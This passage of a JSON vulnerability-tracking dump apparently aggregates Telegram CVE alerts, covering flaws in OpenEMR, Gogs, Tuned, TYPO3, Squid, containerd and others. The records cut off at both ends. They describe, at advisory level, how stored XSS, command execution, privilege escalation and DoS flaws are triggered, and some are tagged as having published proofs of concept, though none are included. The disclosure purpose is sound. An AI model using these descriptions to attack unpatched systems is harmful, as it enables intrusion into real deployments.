"https://t.me/DarkWebInformer_CVEAlerts/17448", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32794\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. A stored cross-site scripting (XSS) vulnerability in versions prior to 7.0.3.4 allows any authenticated user with patient creation privileges to inject arbitrary JavaScript code into the system by entering malicious payloads in the First and Last Name fields during patient registration. This code is later executed when viewing the patient's encounter under Orders \u2192 Procedure Orders. Version 7.0.3.4 contains a patch for the issue.\n\ud83d\udccf Published: 2025-05-23T15:15:32.925Z\n\ud83d\udccf Modified: 2025-05-23T17:00:53.086Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-3c27-2m7h-f7rx", "creation_timestamp": "2025-05-23T17:47:57.000000Z"}, {"uuid": "acf0b38a-26ff-4035-a4df-43fd782c2ef3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RVHC-RCH9-J943", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17120", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-49345\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H)\n\ud83d\udd39 Description: Temporary data passed between application components by Budgie Extras Takeabreak applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.\n\ud83d\udccf Published: 2023-12-14T21:31:15.978Z\n\ud83d\udccf Modified: 2025-05-21T14:30:27.043Z\n\ud83d\udd17 References:\n1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49345\n2. https://ubuntu.com/security/notices/USN-6556-1\n3. https://github.com/UbuntuBudgie/budgie-extras/security/advisories/GHSA-rvhc-rch9-j943", "creation_timestamp": "2025-05-21T14:43:10.000000Z"}, {"uuid": "f84961b1-1f0a-478e-ab85-8e9eb0a31908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CXFP-7PVR-95FF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17158", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47291\n\ud83d\udd25 CVSS Score: 4.6 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: containerd is an open-source container runtime. A bug was found in the containerd's CRI implementation where containerd, starting in version 2.0.1 and prior to version 2.0.5, doesn't put usernamespaced containers under the Kubernetes' cgroup hierarchy, therefore some Kubernetes limits are not honored. This may cause a denial of service of the Kubernetes node. This bug has been fixed in containerd 2.0.5+ and 2.1.0+. Users should update to these versions to resolve the issue. As a workaround, disable usernamespaced pods in Kubernetes temporarily.\n\ud83d\udccf Published: 2025-05-21T17:26:31.141Z\n\ud83d\udccf Modified: 2025-05-21T17:26:31.141Z\n\ud83d\udd17 References:\n1. https://github.com/containerd/containerd/security/advisories/GHSA-cxfp-7pvr-95ff", "creation_timestamp": "2025-05-21T17:43:13.000000Z"}, {"uuid": "95fe99e2-5e8d-4b47-9030-ace61da69240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8FCW-V6GR-HP34", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17264", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4280\n\ud83d\udd25 CVSS Score: 4.8 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: MacOS version of Poedit bundles a\u00a0Python interpreter that inherits the Transparency, Consent, and Control (TCC) permissions\ngranted by the user to the main application bundle. An attacker with local user access can\ninvoke this interpreter with arbitrary commands or scripts, leveraging the\napplication's previously granted TCC permissions to access user's files in privacy-protected folders without triggering user prompts. Accessing other resources beyond previously granted TCC permissions will prompt the user for approval in the name of Poedit, potentially disguising attacker's malicious intent.\n\nThis issue has been fixed in 3.6.3 version of Poedit.\n\ud83d\udccf Published: 2025-05-22T09:59:30.632Z\n\ud83d\udccf Modified: 2025-05-22T09:59:57.224Z\n\ud83d\udd17 References:\n1. https://cert.pl/posts/2025/05/CVE-2025-4280\n2. https://cert.pl/en/posts/2025/05/CVE-2025-4280\n3. https://poedit.net\n4. https://github.com/vslavik/poedit\n5. https://github.com/vslavik/poedit/security/advisories/GHSA-8fcw-v6gr-hp34", "creation_timestamp": "2025-05-22T10:43:21.000000Z"}, {"uuid": "9e28260b-8ee4-47d0-935b-4e0b96f4eff8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17097", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52336\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A script injection vulnerability was identified in the Tuned package. The `instance_create()` D-Bus function can be called by locally logged-in users without authentication. This flaw allows a local non-privileged user to execute a D-Bus call with `script_pre` or `script_post` options that permit arbitrary scripts with their absolute paths to be passed. These user or attacker-controlled executable scripts or programs could then be executed by Tuned with root privileges that could allow attackers to local privilege escalation.\n\ud83d\udccf Published: 2024-11-26T15:21:13.518Z\n\ud83d\udccf Modified: 2025-05-21T01:04:32.633Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10384\n2. https://access.redhat.com/errata/RHSA-2025:0879\n3. https://access.redhat.com/errata/RHSA-2025:0880\n4. https://access.redhat.com/security/cve/CVE-2024-52336\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2324540\n6. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n7. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "98e13ae3-8066-4349-a6df-c7ec2024acc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17097", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52336\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A script injection vulnerability was identified in the Tuned package. The `instance_create()` D-Bus function can be called by locally logged-in users without authentication. This flaw allows a local non-privileged user to execute a D-Bus call with `script_pre` or `script_post` options that permit arbitrary scripts with their absolute paths to be passed. These user or attacker-controlled executable scripts or programs could then be executed by Tuned with root privileges that could allow attackers to local privilege escalation.\n\ud83d\udccf Published: 2024-11-26T15:21:13.518Z\n\ud83d\udccf Modified: 2025-05-21T01:04:32.633Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10384\n2. https://access.redhat.com/errata/RHSA-2025:0879\n3. https://access.redhat.com/errata/RHSA-2025:0880\n4. https://access.redhat.com/security/cve/CVE-2024-52336\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2324540\n6. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n7. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "010d7c80-4c98-46bf-a399-84000cbdc504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4277", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "6dabc1b8-ba6e-4c28-86c2-9375520c6462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4420", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "9352a1aa-5e66-48a2-937e-8213244bf1cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4373", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "c04a0847-a2b9-4d51-9f5f-a2b0c2c02ed9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WGQ4-4CFG-C4X3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17119", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-50269\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: Squid is a caching proxy for the Web. Due to an Uncontrolled Recursion bug in versions 2.6 through 2.7.STABLE9, versions 3.1 through 5.9, and versions 6.0.1 through 6.5, Squid may be vulnerable to a Denial of Service attack against HTTP Request parsing. This problem allows a remote client to perform Denial of Service attack by sending a large X-Forwarded-For header when the follow_x_forwarded_for feature is configured. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives.\n\ud83d\udccf Published: 2023-12-14T17:09:25.168Z\n\ud83d\udccf Modified: 2025-05-21T14:31:00.896Z\n\ud83d\udd17 References:\n1. https://github.com/squid-cache/squid/security/advisories/GHSA-wgq4-4cfg-c4x3\n2. http://www.squid-cache.org/Versions/v5/SQUID-2023_10.patch\n3. http://www.squid-cache.org/Versions/v6/SQUID-2023_10.patch\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/\n5. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/A5QASTMCUSUEW3UOMKHZJB3FTONWSRXS/\n6. https://lists.debian.org/debian-lts-announce/2024/01/msg00003.html\n7. https://security.netapp.com/advisory/ntap-20240119-0005/", "creation_timestamp": "2025-05-21T14:42:44.000000Z"}, {"uuid": "4d27aa77-55cd-4774-9e72-0062a157fa5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7QJ6-JXFC-XW4V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17407", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32967\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. A logging oversight in versions prior to 7.0.3.4 allows password change events to go unrecorded on the client-side log viewer, preventing administrators from auditing critical actions. This weakens traceability and opens the system to undetectable misuse by insiders or attackers. Version 7.0.3.4 contains a patch for the issue.\n\ud83d\udccf Published: 2025-05-23T15:31:52.551Z\n\ud83d\udccf Modified: 2025-05-23T15:40:15.258Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-7qj6-jxfc-xw4v", "creation_timestamp": "2025-05-23T15:44:32.000000Z"}, {"uuid": "00b9b0c8-b217-4c14-8a4c-e08b60d3ba71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJ44-9VCG-WJQ7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19309", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56731\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Gogs is an open source self-hosted Git service. Prior to version 0.13.3, it's still possible to delete files under the .git directory and achieve remote command execution due to an insufficient patch for CVE-2024-39931. Unprivileged user accounts can execute arbitrary commands on the Gogs instance with the privileges of the account specified by RUN_USER in the configuration. Allowing attackers to access and alter any users' code hosted on the same instance. This issue has been patched in version 0.13.3.\n\ud83d\udccf Published: 2025-06-24T03:37:42.327Z\n\ud83d\udccf Modified: 2025-06-24T03:37:42.327Z\n\ud83d\udd17 References:\n1. https://github.com/gogs/gogs/security/advisories/GHSA-wj44-9vcg-wjq7\n2. https://github.com/gogs/gogs/commit/77a4a945ae9a87f77e392e9066b560edb71b5de9\n3. https://github.com/gogs/gogs/releases/tag/v0.13.3", "creation_timestamp": "2025-06-24T04:48:49.000000Z"}, {"uuid": "0697e3c0-6e5a-4192-b237-ca43afa791f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VCJX-VW28-25P2", "type": "seen", "source": "Telegram/7kKxZY5KjVtNNq82uAZn6qPfMFkWsKJQXsAec31tF_mY8_8", "content": "", "creation_timestamp": "2026-04-20T17:21:45.000000Z"}, {"uuid": "746fc01c-ee98-4aaa-b7d5-df5a6e358dd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W73R-2449-QWGH", "type": "seen", "source": "Telegram/7kKxZY5KjVtNNq82uAZn6qPfMFkWsKJQXsAec31tF_mY8_8", "content": "", "creation_timestamp": "2026-04-20T17:21:45.000000Z"}, {"uuid": "cba8fc1e-c63c-47f6-824d-da417af66d8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-87J8-6F7G-H8WH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19782", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53094\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: ESPAsyncWebServer is an asynchronous HTTP and WebSocket server library for ESP32, ESP8266, RP2040 and RP2350. In versions up to and including 3.7.8, a CRLF (Carriage Return Line Feed) injection vulnerability exists in the construction and output of HTTP headers within `AsyncWebHeader.cpp`. Unsanitized input allows attackers to inject CR (`\\r`) or LF (`\\n`) characters into header names or values, leading to arbitrary header or response manipulation. Manipulation of HTTP headers and responses can enable a wide range of attacks, making the severity of this vulnerability high. A fix is available at pull request 211 and is expected to be part of version 3.7.9.\n\ud83d\udccf Published: 2025-06-27T19:57:15.032Z\n\ud83d\udccf Modified: 2025-06-27T20:19:14.457Z\n\ud83d\udd17 References:\n1. https://github.com/ESP32Async/ESPAsyncWebServer/security/advisories/GHSA-87j8-6f7g-h8wh\n2. https://github.com/ESP32Async/ESPAsyncWebServer/pull/211\n3. https://github.com/ESP32Async/ESPAsyncWebServer/blob/1095dfd1ecf1a903aede29854232af1b24f089b1/src/AsyncWebHeader.cpp#L6-L32", "creation_timestamp": "2025-06-27T20:52:27.000000Z"}, {"uuid": "d0c99487-1fbf-446d-b86c-fa42adbffc77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P3R-HH9G-5CMG", "type": "seen", "source": "Telegram/wz0kiY1tb5u805P38ZVeawoTKuvhTd24bOWQm-Bt9SZek-4", "content": "", "creation_timestamp": "2026-04-21T01:18:48.000000Z"}, {"uuid": "2a32099d-0491-463b-87c1-1f456ad098b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-436G-FHFC-9G5W", "type": "seen", "source": "Telegram/KXW7G8PyX_XZwX9Od1pYkShAhyWITcXi61d9qyY3YKOVjQs", "content": "", "creation_timestamp": "2026-04-20T19:17:48.000000Z"}, {"uuid": "c0b4fc8b-94a3-4ba0-9b19-7f08b2d66d3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45JJ-R48J-75PP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17334", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48369\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P)\n\ud83d\udd39 Description: Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.119 and 25.0.20, a persistent Cross-Site Scripting (XSS) vulnerability exists in Groupoffice's tasks comment functionality, allowing attackers to execute arbitrary JavaScript by uploading an file with a crafted filename. When administrators or other users view the task containing this malicious file, the payload executes in their browser context. The application fails to sanitize image filenames before rendering them in the comment. By uploading an image with a crafted filename containing XSS payloads, attackers can steal sensitive information. Versions 6.8.119 and 25.0.20 contain a fix for the issue.\n\ud83d\udccf Published: 2025-05-22T17:33:06.254Z\n\ud83d\udccf Modified: 2025-05-22T17:33:06.254Z\n\ud83d\udd17 References:\n1. https://github.com/Intermesh/groupoffice/security/advisories/GHSA-45jj-r48j-75pp", "creation_timestamp": "2025-05-22T17:43:35.000000Z"}, {"uuid": "5126abed-c41a-4395-9669-8d467f87b793", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4PG4-QVPC-4Q3H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16917", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47944\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.\n\ud83d\udccf Published: 2025-05-19T19:20:45.401Z\n\ud83d\udccf Modified: 2025-05-19T19:20:45.401Z\n\ud83d\udd17 References:\n1. https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h\n2. https://github.com/expressjs/multer/issues/1176\n3. https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", "creation_timestamp": "2025-05-19T19:39:08.000000Z"}, {"uuid": "647c0686-435e-41aa-a528-1bc5cca09540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6V9C-7CG6-27Q7", "type": "seen", "source": "Telegram/FGivxNz61ghqDj4ER4orUo942MC3d41x9N89ngSi7socZnE", "content": "", "creation_timestamp": "2026-04-24T19:23:26.000000Z"}, {"uuid": "581c5864-d4fb-4ac1-9ee7-be77c5e5c0d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CHQ-WFR3-2HJ9", "type": "seen", "source": "Telegram/FGivxNz61ghqDj4ER4orUo942MC3d41x9N89ngSi7socZnE", "content": "", "creation_timestamp": "2026-04-24T19:23:26.000000Z"}, {"uuid": "85a09389-b2a1-4ac9-bd01-03e56c61aea9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3HW7-QJ9H-R835", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16973", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47283\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Gardener implements the automated management and operation of Kubernetes clusters as a service. A security vulnerability was discovered in Gardener prior to versions 1.116.4, 1.117.5, 1.118.2, and 1.119.0 that could allow a user with administrative privileges for a Gardener project to obtain control over the seed cluster(s) where their shoot clusters are managed. This CVE affects all Gardener installations no matter of the public cloud provider(s) used for the seed clusters/shoot clusters. `gardener/gardener` (`gardenlet`) is the affected component. Versions 1.116.4, 1.117.5, 1.118.2, and 1.119.0 fix the issue.\n\ud83d\udccf Published: 2025-05-19T18:46:11.863Z\n\ud83d\udccf Modified: 2025-05-20T13:10:08.239Z\n\ud83d\udd17 References:\n1. https://github.com/gardener/gardener/security/advisories/GHSA-3hw7-qj9h-r835", "creation_timestamp": "2025-05-20T13:40:27.000000Z"}, {"uuid": "32d7824c-ebb1-4c98-8c56-b40b40c388d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-744G-7QM9-HJH9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16980", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47941\n\ud83d\udd25 CVSS Score: 7.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: TYPO3 is an open source, PHP based web content management system. In versions on the 12.x branch prior to 12.4.31 LTS and the 13.x branch prior to 13.4.2 LTS, the multifactor authentication (MFA) dialog presented during backend login can be bypassed due to insufficient enforcement of access restrictions on all backend routes. Successful exploitation requires valid backend user credentials, as MFA can only be bypassed after successful authentication. Users should update to TYPO3 version 12.4.31 LTS or 13.4.12 LTS to fix the problem.\n\ud83d\udccf Published: 2025-05-20T14:07:33.017Z\n\ud83d\udccf Modified: 2025-05-20T14:34:13.675Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-744g-7qm9-hjh9\n2. https://typo3.org/security/advisory/typo3-core-sa-2025-015", "creation_timestamp": "2025-05-20T14:40:38.000000Z"}, {"uuid": "5fa7ee00-bacd-40fa-a98c-1ab9732e918e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5H5-54GP-XH4Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17293", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46714\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Sandboxie is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. Starting in version 1.3.0 and prior to 1.15.12, API_GET_SECURE_PARAM has an arithmetic overflow leading to a small memory allocation and then a extremely large copy into the small allocation. Version 1.15.12 fixes the issue.\n\ud83d\udccf Published: 2025-05-22T12:27:57.002Z\n\ud83d\udccf Modified: 2025-05-22T14:21:10.879Z\n\ud83d\udd17 References:\n1. https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-c5h5-54gp-xh4q", "creation_timestamp": "2025-05-22T14:44:21.000000Z"}, {"uuid": "570e991a-2ef4-46cb-b343-08b375ac1248", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WR3V-9P2C-CHX7", "type": "seen", "source": 